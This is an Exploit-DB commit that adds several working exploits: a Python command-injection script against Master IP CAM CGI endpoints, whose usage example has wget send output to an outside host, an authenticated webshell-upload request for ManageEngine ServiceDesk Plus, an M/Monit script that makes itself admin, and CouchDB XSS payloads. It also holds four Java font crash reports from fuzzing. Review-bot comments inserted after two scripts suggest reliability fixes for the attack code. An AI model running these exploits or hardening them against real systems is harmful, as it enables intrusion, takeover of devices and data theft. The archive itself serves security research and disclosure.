DB: 2019-02-19

25 changes to exploits/shellcodes

Realterm Serial Terminal 2.0.0.70 - Denial of Service
Realterm Serial Terminal 2.0.0.70 - Local Buffer Overflow (SEH)
NBMonitor 1.6.5.0 - 'Key' Denial of Service (PoC)
Oracle Java Runtime Environment - Heap Out-of-Bounds Read During OTF Font Rendering in glyph_CloseContour
Oracle Java Runtime Environment - Heap Out-of-Bounds Read During TTF Font Rendering in OpenTypeLayoutEngine::adjustGlyphPositions
Oracle Java Runtime Environment - Heap Out-of-Bounds Read During TTF Font Rendering in ExtractBitMap_blocClass
Oracle Java Runtime Environment - Heap Out-of-Bounds Read During TTF Font Rendering in AlternateSubstitutionSubtable::process

mIRC < 7.55 - Remote Command Execution Using Argument Injection Through Custom URI Protocol Handlers
qdPM 9.1 - 'type' Cross-Site Scripting
qdPM 9.1 - 'search[keywords]' Cross-Site Scripting
Master IP CAM 01 3.3.4.2103 - Remote Command Execution
MISP 2.4.97 - SQL Command Execution via Command Injection in STIX Module
CMSsite 1.0 - 'post' SQL Injection
M/Monit 3.7.2 - Privilege Escalation
Webiness Inventory 2.3 - 'ProductModel' Arbitrary File Upload
Apache CouchDB 2.3.0 - Cross-Site Scripting
ArangoDB Community Edition 3.4.2-1 - Cross-Site Scripting
Comodo Dome Firewall 2.7.0 - Cross-Site Scripting
Zoho ManageEngine ServiceDesk Plus (SDP) < 10.0 build 10012 - Arbitrary File Upload
WordPress Plugin WooCommerce - GloBee (cryptocurrency) Payment Gateway 1.1.1 - Payment Bypass / Unauthorized Order Status Spoofing

macOS - Reverse (::1:4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (119 bytes)
macOS - Bind (4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (129 bytes)
macOS - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (103 bytes)
macOS - Bind (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (123 bytes)
macOS - execve(/bin/sh) + Null-Free Shellcode (31 bytes)
This commit is contained in:
Offensive Security 2019-02-19 05:02:08 +00:00
parent 997deeda21
commit cd868436ff
27 changed files with 2631 additions and 0 deletions

exploits/cgi/webapps/46400.py Executable file

@ -0,0 +1,52 @@
# Exploit Title: Master IP CAM 01 Remote Command Execution
# Date: 09-02-2019
# Remote: Yes
# Exploit Authors: Raffaele Sabato
# Contact: https://twitter.com/syrion89
# Vendor: Master IP CAM
# Version: 3.3.4.2103
# CVE: CVE-2019-8387
import sys
import requests
if len(sys.argv) < 3:
print "[-] Usage: python MasterIpCamRCE.py <ip> <cmd>"
print "[-] Example: python MasterIpCamRCE.py 192.168.1.54 'wget http://192.168.1.55:4444/$(id)'"
exit(1)
host = sys.argv[1]
command = sys.argv[2]
page = [
"bconf.cgi",
"ddns_start.cgi",
"getddnsattr.cgi",
"getinetattr.cgi",
"getnettype.cgi",
"getupnp.cgi",
"getwifiattr.cgi",
"getwifistatus.cgi",
"inetconfig.cgi",
"iptest.cgi",
"listwifiap.cgi",
"p2p.cgi",
"paraconf.cgi",
"scanwifi.cgi",
"setadslattr.cgi",
"setddnsattr.cgi",
"setinetattr.cgi",
"setwifiattr.cgi",
"upnp_start.cgi",
"wifimode.cgi",
"wifitest.cgi",
]
for x in page:
url = "http://"+host+"/cgi-bin/"+x+"?cmd=`"+command+"`"
#url = "http://"+host+"/cgi-bin/"+x+"?action=`"+command+"`"
print "[*] Attack on "+x
print "[+] Sending the payload"
r = requests.get(url)
if r.status_code == 200:
print "[+] Exploit Success"
break
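Review bot: `r = requests.get(url)` just before the status check has no `timeout` and no exception handling, so a single unreachable host stalls the 21-endpoint loop indefinitely and a connection error ends the run with an unhandled traceback; `r = requests.get(url, timeout=10)` inside a `try`/`except requests.RequestException` that prints the failure and continues would make the loop predictable. The `status_code == 200` test that follows only proves the CGI script answered, not that the `cmd` parameter was acted on, so the `[+] Exploit Success` message is a weak indicator and the line deserves a comment saying exactly that. The `print` statements tie the file to Python 2, which the header block should state alongside the other metadata. From a detection standpoint, the unencoded backtick payload is carried in the query string, so it would normally appear verbatim in the device's web-server access log for any of the listed `/cgi-bin/` endpoints.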


@ -0,0 +1,94 @@
A heap-based out-of-bounds read was observed in Oracle Java Runtime Environment version 8u202 (latest at the time of this writing) while fuzz-testing the processing of OpenType fonts. It manifests itself in the form of the following crash (with AFL's libdislocator):
--- cut ---
gdb$ c
Continuing.
Iteration (0,0)
Thread 2 "java" received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0x6d1a
RBX: 0x7fffb5d94f48 --> 0x7fffb6319f00 --> 0x53ab1500ff
RCX: 0xffffffffffff0000
RDX: 0x7fff28fbdfe6 --> 0x2a001d00100003
RSI: 0x7fff28fadfe8 --> 0x1e001100040000
[...]
[-------------------------------------code-------------------------------------]
0x7fffb6395564 <glyph_CloseContour+148>: mov rsi,QWORD PTR [rbx+0x20]
0x7fffb6395568 <glyph_CloseContour+152>: add rcx,rcx
0x7fffb639556b <glyph_CloseContour+155>: lea rdi,[rdx+rcx*1-0x2]
=> 0x7fffb6395570 <glyph_CloseContour+160>: movsx rsi,WORD PTR [rsi+rcx*1-0x2]
0x7fffb6395576 <glyph_CloseContour+166>: mov rdx,QWORD PTR [rbx+0x30]
0x7fffb639557a <glyph_CloseContour+170>: movsx rcx,WORD PTR [rdi]
0x7fffb639557e <glyph_CloseContour+174>: movzx r8d,WORD PTR [rdx+rcx*2]
0x7fffb6395583 <glyph_CloseContour+179>: cmp WORD PTR [rdx+rsi*2],r8w
[...]
Stopped reason: SIGSEGV
0x00007fffb6395570 in glyph_CloseContour () from jre/8u202/lib/amd64/libt2k.so
gdb-peda$ where
#0 0x00007fffb6395570 in glyph_CloseContour () from jre/8u202/lib/amd64/libt2k.so
#1 0x00007fffb63ad71c in Type2BuildChar () from jre/8u202/lib/amd64/libt2k.so
#2 0x00007fffb63afa01 in Type2BuildChar () from jre/8u202/lib/amd64/libt2k.so
#3 0x00007fffb63afa01 in Type2BuildChar () from jre/8u202/lib/amd64/libt2k.so
#4 0x00007fffb63afa01 in Type2BuildChar () from jre/8u202/lib/amd64/libt2k.so
#5 0x00007fffb63afa01 in Type2BuildChar () from jre/8u202/lib/amd64/libt2k.so
#6 0x00007fffb63afa01 in Type2BuildChar () from jre/8u202/lib/amd64/libt2k.so
#7 0x00007fffb63afa01 in Type2BuildChar () from jre/8u202/lib/amd64/libt2k.so
#8 0x00007fffb63afa01 in Type2BuildChar () from jre/8u202/lib/amd64/libt2k.so
#9 0x00007fffb63afa01 in Type2BuildChar () from jre/8u202/lib/amd64/libt2k.so
#10 0x00007fffb63afa01 in Type2BuildChar () from jre/8u202/lib/amd64/libt2k.so
#11 0x00007fffb63afa01 in Type2BuildChar () from jre/8u202/lib/amd64/libt2k.so
#12 0x00007fffb63b469c in tsi_T2GetGlyphByIndex () from jre/8u202/lib/amd64/libt2k.so
#13 0x00007fffb63b5655 in tsi_NewCFFClass () from jre/8u202/lib/amd64/libt2k.so
#14 0x00007fffb63c73c8 in New_sfntClassLogical () from jre/8u202/lib/amd64/libt2k.so
#15 0x00007fffb63a43e3 in Java_sun_font_T2KFontScaler_initNativeScaler () from jre/8u202/lib/amd64/libt2k.so
#16 0x00007fffe5e376c7 in ?? ()
#17 0x00007fff0003ccc0 in ?? ()
#18 0x0000000000000000 in ?? ()
--- cut ---
The crash reproduces on both Windows and Linux platforms. On Windows, the crash can be observed with PageHeap enabled for the java.exe process:
--- cut ---
(5f34.5d1c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
t2k+0xfbec:
00007ffa`0b4cfbec 4e0fbf4c50fe movsx r9,word ptr [rax+r10*2-2] ds:00000000`39c44ffe=????
0:004> k
# Child-SP RetAddr Call Site
00 00000000`0d82de70 00007ffa`0b4e0c0d t2k+0xfbec
01 00000000`0d82dea0 00007ffa`0b4e2979 t2k!Java_sun_font_T2KFontScaler_getGlyphCodeNative+0x5305
02 00000000`0d82df20 00007ffa`0b4e2979 t2k!Java_sun_font_T2KFontScaler_getGlyphCodeNative+0x7071
03 00000000`0d82dfa0 00007ffa`0b4e2979 t2k!Java_sun_font_T2KFontScaler_getGlyphCodeNative+0x7071
04 00000000`0d82e020 00007ffa`0b4e2979 t2k!Java_sun_font_T2KFontScaler_getGlyphCodeNative+0x7071
05 00000000`0d82e0a0 00007ffa`0b4e2979 t2k!Java_sun_font_T2KFontScaler_getGlyphCodeNative+0x7071
06 00000000`0d82e120 00007ffa`0b4e2979 t2k!Java_sun_font_T2KFontScaler_getGlyphCodeNative+0x7071
07 00000000`0d82e1a0 00007ffa`0b4e2979 t2k!Java_sun_font_T2KFontScaler_getGlyphCodeNative+0x7071
08 00000000`0d82e220 00007ffa`0b4e2979 t2k!Java_sun_font_T2KFontScaler_getGlyphCodeNative+0x7071
09 00000000`0d82e2a0 00007ffa`0b4e2979 t2k!Java_sun_font_T2KFontScaler_getGlyphCodeNative+0x7071
0a 00000000`0d82e320 00007ffa`0b4e2979 t2k!Java_sun_font_T2KFontScaler_getGlyphCodeNative+0x7071
0b 00000000`0d82e3a0 00007ffa`0b4e3dd1 t2k!Java_sun_font_T2KFontScaler_getGlyphCodeNative+0x7071
0c 00000000`0d82e420 00007ffa`0b4e4108 t2k!Java_sun_font_T2KFontScaler_getGlyphCodeNative+0x84c9
0d 00000000`0d82e460 00007ffa`0b4e47e4 t2k!Java_sun_font_T2KFontScaler_getGlyphCodeNative+0x8800
0e 00000000`0d82e4b0 00007ffa`0b4f07c5 t2k!Java_sun_font_T2KFontScaler_getGlyphCodeNative+0x8edc
0f 00000000`0d82e500 00007ffa`0b4f0b11 t2k!Java_sun_font_T2KFontScaler_getGlyphVectorOutlineNative+0x72c9
10 00000000`0d82e560 00007ffa`0b4d9ef6 t2k!Java_sun_font_T2KFontScaler_getGlyphVectorOutlineNative+0x7615
11 00000000`0d82e5e0 00000000`0f928d27 t2k!Java_sun_font_T2KFontScaler_initNativeScaler+0x2c2
12 00000000`0d82e650 00000000`2ad8f228 0xf928d27
13 00000000`0d82e658 00000000`b0063339 0x2ad8f228
14 00000000`0d82e660 00000000`0d82e730 0xb0063339
15 00000000`0d82e668 00000000`b006f271 0xd82e730
16 00000000`0d82e670 00000000`00000000 0xb006f271
0:004> ? rax
Evaluate expression: 969232384 = 00000000`39c55000
0:004> ? r10
Evaluate expression: -32768 = ffffffff`ffff8000
--- cut ---
Attached with this report are three mutated testcases, and a simple Java program used to reproduce the vulnerability by loading OpenType fonts specified through a command-line parameter.
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46409.zip


@ -0,0 +1,96 @@
A heap-based out-of-bounds read was observed in Oracle Java Runtime Environment version 8u202 (latest at the time of this writing) while fuzz-testing the processing of TrueType fonts. It manifests itself in the form of the following (or similar) crash:
--- cut ---
$ bin/java -cp . DisplaySfntFont test.ttf
Iteration (0,0)
Iteration (0,1)
Iteration (0,2)
Iteration (0,3)
Iteration (0,4)
#
# A fatal error has been detected by the Java Runtime Environment:
#
# SIGSEGV (0xb) at pc=0x00007fbaa11694c8, pid=19540, tid=0x00007fbac4f18700
#
# JRE version: Java(TM) SE Runtime Environment (8.0_202-b08) (build 1.8.0_202-b08)
# Java VM: Java HotSpot(TM) 64-Bit Server VM (25.202-b08 mixed mode linux-amd64 compressed oops)
# Problematic frame:
# C [libfontmanager.so+0x284c8] OpenTypeLayoutEngine::adjustGlyphPositions(unsigned short const*, int, int, char, LEGlyphStorage&, LEErrorCode&)+0x268
#
# Failed to write core dump. Core dumps have been disabled. To enable core dumping, try "ulimit -c unlimited" before starting Java again
#
# An error report file with more information is saved as:
# jre/8u202/hs_err_pid19540.log
#
# If you would like to submit a bug report, please visit:
# http://bugreport.java.com/bugreport/crash.jsp
# The crash happened outside the Java Virtual Machine in native code.
# See problematic frame for where to report the bug.
#
Aborted
--- cut ---
Under gdb, we can find out that the OpenTypeLayoutEngine::adjustGlyphPositions function attempts to access an invalid memory region:
--- cut ---
gdb-peda$ c
Continuing.
Iteration (0,0)
Iteration (0,1)
Iteration (0,2)
Iteration (0,3)
Iteration (0,4)
Thread 2 "java" received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0x7ffff0283cc0 --> 0x0
[...]
[-------------------------------------code-------------------------------------]
0x7fffc41cb4bb <_ZN20OpenTypeLayoutEngine20adjustGlyphPositionsEPKtiicR14LEGlyphStorageR11LEErrorCode+603>: nop DWORD PTR [rax+rax*1+0x0]
0x7fffc41cb4c0 <_ZN20OpenTypeLayoutEngine20adjustGlyphPositionsEPKtiicR14LEGlyphStorageR11LEErrorCode+608>: lea rax,[rax+rax*4]
0x7fffc41cb4c4 <_ZN20OpenTypeLayoutEngine20adjustGlyphPositionsEPKtiicR14LEGlyphStorageR11LEErrorCode+612>: lea rax,[rdx+rax*4]
=> 0x7fffc41cb4c8 <_ZN20OpenTypeLayoutEngine20adjustGlyphPositionsEPKtiicR14LEGlyphStorageR11LEErrorCode+616>: addss xmm0,DWORD PTR [rax]
0x7fffc41cb4cc <_ZN20OpenTypeLayoutEngine20adjustGlyphPositionsEPKtiicR14LEGlyphStorageR11LEErrorCode+620>: addss xmm1,DWORD PTR [rax+0x4]
0x7fffc41cb4d1 <_ZN20OpenTypeLayoutEngine20adjustGlyphPositionsEPKtiicR14LEGlyphStorageR11LEErrorCode+625>: movsxd rax,DWORD PTR [rax+0x10]
0x7fffc41cb4d5 <_ZN20OpenTypeLayoutEngine20adjustGlyphPositionsEPKtiicR14LEGlyphStorageR11LEErrorCode+629>: test eax,eax
0x7fffc41cb4d7 <_ZN20OpenTypeLayoutEngine20adjustGlyphPositionsEPKtiicR14LEGlyphStorageR11LEErrorCode+631>:
jns 0x7fffc41cb4c0 <_ZN20OpenTypeLayoutEngine20adjustGlyphPositionsEPKtiicR14LEGlyphStorageR11LEErrorCode+608>
[------------------------------------stack-------------------------------------]
[...]
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x00007fffc41cb4c8 in OpenTypeLayoutEngine::adjustGlyphPositions(unsigned short const*, int, int, char, LEGlyphStorage&, LEErrorCode&) ()
from jre/8u202/lib/amd64/libfontmanager.so
--- cut ---
The crash reproduces on both Windows and Linux platforms. On Windows, the crash manifests in the following way:
--- cut ---
(3798.db8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
fontmanager!Java_sun_java2d_loops_DrawGlyphListLCD_DrawGlyphListLCD+0x13346:
00007ffa`0c9eb046 8b448a10 mov eax,dword ptr [rdx+rcx*4+10h] ds:00000000`69815274=????????
0:004> ? rdx
Evaluate expression: 1696397556 = 00000000`651cf8f4
0:004> ? rcx
Evaluate expression: 18421340 = 00000000`0119165c
0:004> k
# Child-SP RetAddr Call Site
00 00000000`055ce250 00007ffa`0c9e3c3f fontmanager!Java_sun_java2d_loops_DrawGlyphListLCD_DrawGlyphListLCD+0x13346
01 00000000`055ce3c0 00007ffa`0c9ef6fe fontmanager!Java_sun_java2d_loops_DrawGlyphListLCD_DrawGlyphListLCD+0xbf3f
02 00000000`055ce420 00000000`056e8d27 fontmanager!Java_sun_font_SunLayoutEngine_nativeLayout+0x21e
03 00000000`055ce750 00000000`055ce750 0x56e8d27
04 00000000`055ce758 00000000`5cb9a4a8 0x55ce750
05 00000000`055ce760 00000000`055ce7c0 0x5cb9a4a8
06 00000000`055ce768 00000000`5cb3fd68 0x55ce7c0
07 00000000`055ce770 00000000`055ce8e8 0x5cb3fd68
08 00000000`055ce778 00000000`00000000 0x55ce8e8
--- cut ---
Attached with this report are three mutated testcases, and a simple Java program used to reproduce the vulnerability by loading TrueType fonts specified through a command-line parameter.
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46410.zip


@ -0,0 +1,91 @@
A heap-based out-of-bounds read was observed in Oracle Java Runtime Environment version 8u202 (latest at the time of this writing) while fuzz-testing the processing of TrueType fonts. It manifests itself in the form of the following (or similar) crash:
--- cut ---
Iteration (0,0)
Iteration (0,1)
#
# A fatal error has been detected by the Java Runtime Environment:
#
# SIGSEGV (0xb) at pc=0x00007f857116fde3, pid=31542, tid=0x00007f85a5a70700
#
# JRE version: Java(TM) SE Runtime Environment (8.0_202-b08) (build 1.8.0_202-b08)
# Java VM: Java HotSpot(TM) 64-Bit Server VM (25.202-b08 mixed mode linux-amd64 compressed oops)
# Problematic frame:
# C [libt2k.so+0x4cde3] ExtractBitMap_blocClass+0xcc3
#
# Failed to write core dump. Core dumps have been disabled. To enable core dumping, try "ulimit -c unlimited" before starting Java again
#
# An error report file with more information is saved as:
# jre/8u202/hs_err_pid31542.log
#
# If you would like to submit a bug report, please visit:
# http://bugreport.java.com/bugreport/crash.jsp
# The crash happened outside the Java Virtual Machine in native code.
# See problematic frame for where to report the bug.
#
Aborted
--- cut ---
Under gdb, we can find out that the ExtractBitMap_blocClass function attempts to access an invalid memory region:
--- cut ---
gdb$ c
Continuing.
Iteration (0,0)
Iteration (0,1)
Thread 2 "java" received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0x96e40 ('@n\t')
RBX: 0x100c4
RCX: 0x12dc8
RDX: 0x757969c4
RSI: 0x7ffff02f7238 --> 0x7840201008
[...]
[-------------------------------------code-------------------------------------]
0x7fffbf616ddb <ExtractBitMap_blocClass+3259>: mov ecx,eax
0x7fffbf616ddd <ExtractBitMap_blocClass+3261>: sar ecx,0x3
0x7fffbf616de0 <ExtractBitMap_blocClass+3264>: movsxd rcx,ecx
=> 0x7fffbf616de3 <ExtractBitMap_blocClass+3267>: movzx edi,BYTE PTR [rsi+rcx*1]
0x7fffbf616de7 <ExtractBitMap_blocClass+3271>: cmp edx,r8d
0x7fffbf616dea <ExtractBitMap_blocClass+3274>: jl 0x7fffbf616dd0 <ExtractBitMap_blocClass+3248>
0x7fffbf616dec <ExtractBitMap_blocClass+3276>: mov ecx,r11d
0x7fffbf616def <ExtractBitMap_blocClass+3279>: mov r13d,0x80
[------------------------------------stack-------------------------------------]
[...]
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x00007fffbf616de3 in ExtractBitMap_blocClass () from jre/8u202/lib/amd64/libt2k.so
--- cut ---
The crash reproduces on both Windows and Linux platforms. On Windows, the crash manifests in the following way:
--- cut ---
(5218.154c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
t2k!Java_sun_font_T2KFontScaler_getGlyphVectorOutlineNative+0x2155:
00007ffa`0b8eb651 468a1c20 mov r11b,byte ptr [rax+r12] ds:00000000`64c09000=??
0:004> ? rax
Evaluate expression: 84720 = 00000000`00014af0
0:004> ? r12
Evaluate expression: 1690256656 = 00000000`64bf4510
0:004> k
# Child-SP RetAddr Call Site
00 00000000`04a8e9d0 00007ffa`0b8ebf92 t2k!Java_sun_font_T2KFontScaler_getGlyphVectorOutlineNative+0x2155
01 00000000`04a8eaa0 00007ffa`0b8e8e05 t2k!Java_sun_font_T2KFontScaler_getGlyphVectorOutlineNative+0x2a96
02 00000000`04a8eb80 00007ffa`0b8e9011 t2k!Java_sun_font_T2KFontScaler_getGlyphCodeNative+0xd4fd
03 00000000`04a8ebf0 00007ffa`0b8daeab t2k!Java_sun_font_T2KFontScaler_getGlyphCodeNative+0xd709
04 00000000`04a8ec90 00000000`04f18d27 t2k!Java_sun_font_T2KFontScaler_getGlyphImageNative+0x163
05 00000000`04a8ed60 00000000`02a3e1f8 0x4f18d27
06 00000000`04a8ed68 00000000`04a8ee48 0x2a3e1f8
07 00000000`04a8ed70 00000000`5c36dff8 0x4a8ee48
08 00000000`04a8ed78 00000000`00000000 0x5c36dff8
--- cut ---
Attached with this report are three mutated testcases, and a simple Java program used to reproduce the vulnerability by loading TrueType fonts specified through a command-line parameter.
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46411.zip


@ -0,0 +1,88 @@
A heap-based out-of-bounds read was observed in Oracle Java Runtime Environment version 8u202 (latest at the time of this writing) while fuzz-testing the processing of TrueType fonts. It manifests itself in the form of the following (or similar) crash:
--- cut ---
$ bin/java -cp . DisplaySfntFont test.ttf
Iteration (0,0)
#
# A fatal error has been detected by the Java Runtime Environment:
#
# SIGSEGV (0xb) at pc=0x00007f42e9a30f79, pid=43119, tid=0x00007f431d7fc700
#
# JRE version: Java(TM) SE Runtime Environment (8.0_202-b08) (build 1.8.0_202-b08)
# Java VM: Java HotSpot(TM) 64-Bit Server VM (25.202-b08 mixed mode linux-amd64 compressed oops)
# Problematic frame:
# C [libfontmanager.so+0x7f79] AlternateSubstitutionSubtable::process(LEReferenceTo<AlternateSubstitutionSubtable> const&, GlyphIterator*, LEErrorCode&, LEGlyphFilter const*) const+0xe9
#
# Failed to write core dump. Core dumps have been disabled. To enable core dumping, try "ulimit -c unlimited" before starting Java again
#
# An error report file with more information is saved as:
# jre/8u202/hs_err_pid43119.log
#
# If you would like to submit a bug report, please visit:
# http://bugreport.java.com/bugreport/crash.jsp
# The crash happened outside the Java Virtual Machine in native code.
# See problematic frame for where to report the bug.
#
Aborted
--- cut ---
Under gdb, we can find out that the AlternateSubstitutionSubtable::process function attempts to access an invalid memory region:
--- cut ---
gdb$ c
Continuing.
Iteration (0,0)
Thread 2 "java" received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0x0
RBX: 0x7ffff7fbbc34 --> 0x0
RCX: 0xfff6
RDX: 0x8066
[...]
R12: 0x7ffff0237946 --> 0x100f6ff26000100
[...]
[-------------------------------------code-------------------------------------]
0x7fffcc1aaf72 <_ZNK29AlternateSubstitutionSubtable7processERK13LEReferenceToIS_EP13GlyphIteratorR11LEErrorCodePK13LEGlyphFilter+226>:
movzx ecx,cx
0x7fffcc1aaf75 <_ZNK29AlternateSubstitutionSubtable7processERK13LEReferenceToIS_EP13GlyphIteratorR11LEErrorCodePK13LEGlyphFilter+229>:
cmp ecx,edx
0x7fffcc1aaf77 <_ZNK29AlternateSubstitutionSubtable7processERK13LEReferenceToIS_EP13GlyphIteratorR11LEErrorCodePK13LEGlyphFilter+231>:
jle 0x7fffcc1aaf3e <_ZNK29AlternateSubstitutionSubtable7processERK13LEReferenceToIS_EP13GlyphIteratorR11LEErrorCodePK13LEGlyphFilter+174>
=> 0x7fffcc1aaf79 <_ZNK29AlternateSubstitutionSubtable7processERK13LEReferenceToIS_EP13GlyphIteratorR11LEErrorCodePK13LEGlyphFilter+233>:
movzx eax,WORD PTR [r12+rdx*2+0x6]
0x7fffcc1aaf7f <_ZNK29AlternateSubstitutionSubtable7processERK13LEReferenceToIS_EP13GlyphIteratorR11LEErrorCodePK13LEGlyphFilter+239>:
xor edx,edx
0x7fffcc1aaf81 <_ZNK29AlternateSubstitutionSubtable7processERK13LEReferenceToIS_EP13GlyphIteratorR11LEErrorCodePK13LEGlyphFilter+241>:
rol ax,0x8
0x7fffcc1aaf85 <_ZNK29AlternateSubstitutionSubtable7processERK13LEReferenceToIS_EP13GlyphIteratorR11LEErrorCodePK13LEGlyphFilter+245>:
movzx eax,ax
0x7fffcc1aaf88 <_ZNK29AlternateSubstitutionSubtable7processERK13LEReferenceToIS_EP13GlyphIteratorR11LEErrorCodePK13LEGlyphFilter+248>:
add r12,rax
[------------------------------------stack-------------------------------------]
[...]
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x00007fffcc1aaf79 in AlternateSubstitutionSubtable::process(LEReferenceTo<AlternateSubstitutionSubtable> const&, GlyphIterator*, LEErrorCode&, LEGlyphFilter const*) const () from jre/8u202/lib/amd64/libfontmanager.so
--- cut ---
The crash reproduces on both Windows and Linux platforms. On Windows, the crash manifests in the following way:
--- cut ---
(5ae8.5c58): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
fontmanager+0x11a9:
00007ffa`0d6211a9 0fb74c4306 movzx ecx,word ptr [rbx+rax*2+6] ds:00000000`4484a028=????
0:004> ? rbx
Evaluate expression: 1149476694 = 00000000`44839f56
0:004> ? rax
Evaluate expression: 32870 = 00000000`00008066
--- cut ---
Attached with this report is the mutated testcase, and a simple Java program used to reproduce the vulnerability by loading TrueType fonts specified through a command-line parameter.
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46412.zip


@ -0,0 +1,44 @@
# Exploit Title: Zoho ManageEngine ServiceDesk Plus (SDP) before 10.0 build 10012 - arbitrary file upload
# Date: 18-02-2019
# Exploit Author: Dao Duy Hung (duyhungattt@gmail.com)
# Vendor Homepage: https://www.manageengine.com/products/service-desk/
# Software Link: https://www.manageengine.com/products/service-desk/download.html?opDownload_indexbnr
# Version: 9.4 and 10.0 before 10.0 build 10012
# Tested on: SDP 10.0 build 10000
# CVE : CVE-2019-8394
Detail:
In file common/FileAttachment.jsp line 332 only check file upload extension when parameter 'module' equal to 'SSP' or 'DashBoard' or 'HomePage', and if parameter 'module' is set to 'CustomLogin' will skip check file upload extension function and upload arbitrary file to folder '/custom/login' and this file can access directly from url 'host:port/custom/login/filename' . An authenticated user with minimum permission (ex: guest) can upload webshell to server.
POST /common/FileAttachment.jsp?module=CustomLogin&view=Dashboard1 HTTP/1.1
Host: localhost:8080
Content-Length: 508
Accept: */*
Origin: http://localhost:8080
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Content-Type: multipart/form-data; boundary=----aaa
Referer: http://localhost:8080/DashBoard.do
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,vi;q=0.8
Cookie: COOKIE_SUPPORT=true; GUEST_LANGUAGE_ID=en_US; JSESSIONID=66716A38326AE43058F4A71FCF4E1E42; JSESSIONIDSSO=6970EB5659C20DFF0CF5015D9C91448E; sdpcsrfcookie=ec189770-d1aa-4db3-9a97-36f4ab3db380
Connection: close
------aaa
Content-Disposition: form-data; name="sspsetup"
Attach
------aaa
Content-Disposition: form-data; name="module"
CustomLogin
------aaa
Content-Disposition: form-data; name="filePath"; filename="test.jsp"
Content-Type: text/html
This is shell content
------aaa
Content-Disposition: form-data; name="hmtlcontent"
------aaa--


@ -0,0 +1,54 @@
#!/usr/env/python3
"""
Vulnerability title: M/Monit <= 3.7.2 - Privilege Escalation
Author: Dolev Farhi
Vulnerable version: 2.0.151021
Link: https://mmonit.com
Date: 2/17/2019
"""
import sys
import requests
MMONIT_URL = 'http://ip.add.re.ss:8080'
MMONIT_USER = 'monit' # Default built in unprivileged user
MMONIT_PASS = 'monit'
s = requests.Session()
s.get(MMONIT_URL + '/')
resp = s.post(MMONIT_URL + '/z_security_check', params={'z_username':MMONIT_USER,'z_password':MMONIT_PASS})
if 'Invalid username and/or password' in resp.text:
print('Error logging in')
sys.exit(1)
zessionid = s.cookies.get_dict()['zsessionid']
headers = {
'CSRFToken':zessionid,
}
resp = s.post(MMONIT_URL + '/admin/users/update',
headers=headers,
params={'CSRFTOKEN':zessionid,
'fullname':'john doe',
'password':MMONIT_USER,
'title':'',
'email':'',
'phone':'',
'mobile':'',
'imname':'',
'uname':MMONIT_PASS,
'imtype':None,
'admin':'on',
'oldpassword':'D9CFD4AF77E33817DE2160E0C1C7607C'
})
if resp.status_code == 200:
print('Success! You are now M/Monit admin')
else:
print('Something went wrong')
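Review bot: The user-update request swaps the two constants: `'password':MMONIT_USER` and `'uname':MMONIT_PASS` only work because both defaults are the literal `'monit'`, and changing either constant silently breaks the request; the lines should read `'password':MMONIT_PASS,` and `'uname':MMONIT_USER,`. The shebang `#!/usr/env/python3` is not a valid interpreter path and should be `#!/usr/bin/env python3`. The module docstring states `Vulnerable version: 2.0.151021` while the title says `<= 3.7.2`, which needs reconciling, and the hard-coded `oldpassword` digest presumably corresponds to the default password (not verifiable from the file) — a comment stating where the value comes from would help the next reader. Both POSTs send the credentials and the `admin` flag as URL query parameters via `params=` rather than as a form body, so they land in web-server and proxy access logs, which is worth noting both as a style point and as the trace a defender reviewing M/Monit logs would look for.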


@ -0,0 +1,64 @@
##################################################################################################################################
# Exploit Title: Apache CouchDB 2.3.0 | Cross-Site Scripting
# Date: 17.02.2019
# Exploit Author: Ozer Goker
# Vendor Homepage: http://couchdb.apache.org
# Software Link: http://couchdb.apache.org/#download
# Version: 2.3.0
##################################################################################################################################
Introduction
A CouchDB server hosts named databases, which store documents. Each
document is uniquely named in the database, and CouchDB provides a RESTful
HTTP API for reading and updating (add, edit, delete) database documents.
#################################################################################
XSS details: DOM Based & Reflected & Stored
#################################################################################
XSS1 | DOM Based - Create Database
URL
http://127.0.0.1:5984/_utils/#/_all_dbs
PAYLOAD
<img src=x onerror=alert(1)>
<input id="js-new-database-name" type="text" class="input-xxlarge"
placeholder="Name of database" value="<img src=x onerror=alert(1)>">
#################################################################################
XSS2 | DOM Based & Stored - Add Option
URL
http://127.0.0.1:5984/_utils/#_config/couchdb@localhost
http://127.0.0.1:5984/_node/couchdb@localhost/_config/1/%3Cimg%20src%3Dx%20onerror%3Dalert(2)%3E
METHOD
Put
PAYLOAD
<img src=x onerror=alert(2)>
<input class="input-option-name" type="text" name="name" placeholder="Name">
#################################################################################
XSS3 | DOM Based & Stored - Delete Option
URL
http://127.0.0.1:5984/_utils/#_config/couchdb@localhost
http://127.0.0.1:5984/_node/couchdb@localhost/_config/1/%3Cimg%20src%3Dx%20onerror%3Dalert(2)%3E
METHOD
Delete
PAYLOAD
<img src=x onerror=alert(2)>
#################################################################################


